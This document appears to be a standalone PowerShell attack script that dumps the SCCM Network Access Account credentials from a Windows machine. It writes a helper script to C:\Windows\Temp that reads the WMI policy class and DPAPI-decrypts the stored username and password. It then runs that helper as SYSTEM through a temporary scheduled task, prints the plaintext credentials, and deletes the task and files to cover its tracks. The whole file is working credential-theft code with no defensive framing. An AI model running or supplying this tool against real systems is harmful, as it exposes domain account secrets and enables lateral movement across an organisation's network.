sccm_dump_naa_powershell

sccm_dump_naa_powershell.txt

# -----------------------------
# Paths and task name
# -----------------------------
$BaseDir    = "C:\Windows\Temp"
$ScriptPath = Join-Path $BaseDir "Decrypt-NAA.ps1"
$OutputPath = Join-Path $BaseDir "Decrypt-NAA.out"
$TaskName   = "SCCM_Decrypt_NAA"

# -----------------------------
# Write decrypt script to disk
# -----------------------------
@'
# Credit: Tom Degreef and Kim Oppalfens

# Ensure DPAPI types are available (REQUIRED under SYSTEM)
Add-Type -AssemblyName System.Security

$SCCMSecret = Get-CimInstance `
    -ClassName CCM_NetworkAccessAccount `
    -Namespace root\ccm\policy\machine\actualconfig

foreach ($secret in $SCCMSecret) {

    # -------- Username --------
    $EncodedString = $secret.NetworkAccessUserName.Split('[')[2].Split(']')[0]
    $Array = New-Object Byte[] ($EncodedString.Length / 2)

    for ($i = 0; $i -lt ($EncodedString.Length / 2 - 4); $i++) {
        $Array[$i] = [Convert]::ToByte(
            $EncodedString.Substring(($i + 4) * 2, 2), 16
        )
    }

    $User = [System.Text.Encoding]::Unicode.GetString(
        [System.Security.Cryptography.ProtectedData]::Unprotect(
            $Array,
            $null,
            [System.Security.Cryptography.DataProtectionScope]::CurrentUser
        )
    )

    Write-Output "Decrypted NetworkAccess Account Username = $User"

    # -------- Password --------
    $EncodedString = $secret.NetworkAccessPassword.Split('[')[2].Split(']')[0]
    $Array = New-Object Byte[] ($EncodedString.Length / 2)

    for ($i = 0; $i -lt ($EncodedString.Length / 2 - 4); $i++) {
        $Array[$i] = [Convert]::ToByte(
            $EncodedString.Substring(($i + 4) * 2, 2), 16
        )
    }

    $Password = [System.Text.Encoding]::Unicode.GetString(
        [System.Security.Cryptography.ProtectedData]::Unprotect(
            $Array,
            $null,
            [System.Security.Cryptography.DataProtectionScope]::CurrentUser
        )
    )

    Write-Output "Decrypted NetworkAccess Account Password = $Password"
}
'@ | Set-Content -Encoding UTF8 -Path $ScriptPath

# -----------------------------
# Scheduled task action
# (cmd.exe required for redirection)
# -----------------------------
$Action = New-ScheduledTaskAction `
    -Execute "cmd.exe" `
    -Argument "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -File `"$ScriptPath`" > `"$OutputPath`" 2>&1"

$Principal = New-ScheduledTaskPrincipal `
    -UserId "SYSTEM" `
    -LogonType ServiceAccount `
    -RunLevel Highest

Register-ScheduledTask `
    -TaskName $TaskName `
    -Action $Action `
    -Principal $Principal `
    -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date)) `
    -Force

# -----------------------------
# Run task
# -----------------------------
Start-ScheduledTask -TaskName $TaskName

# -----------------------------
# Wait for completion
# -----------------------------
do {
    Start-Sleep -Milliseconds 500
    $State = (Get-ScheduledTask -TaskName $TaskName |
              Get-ScheduledTaskInfo).State
} while ($State -eq 'Running')

# -----------------------------
# Display output
# -----------------------------
if (Test-Path $OutputPath) {
    Get-Content $OutputPath
} else {
    Write-Host "Output file not found."
}

# -----------------------------
# Cleanup
# -----------------------------
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
Remove-Item -Path $ScriptPath, $OutputPath -Force -ErrorAction SilentlyContinue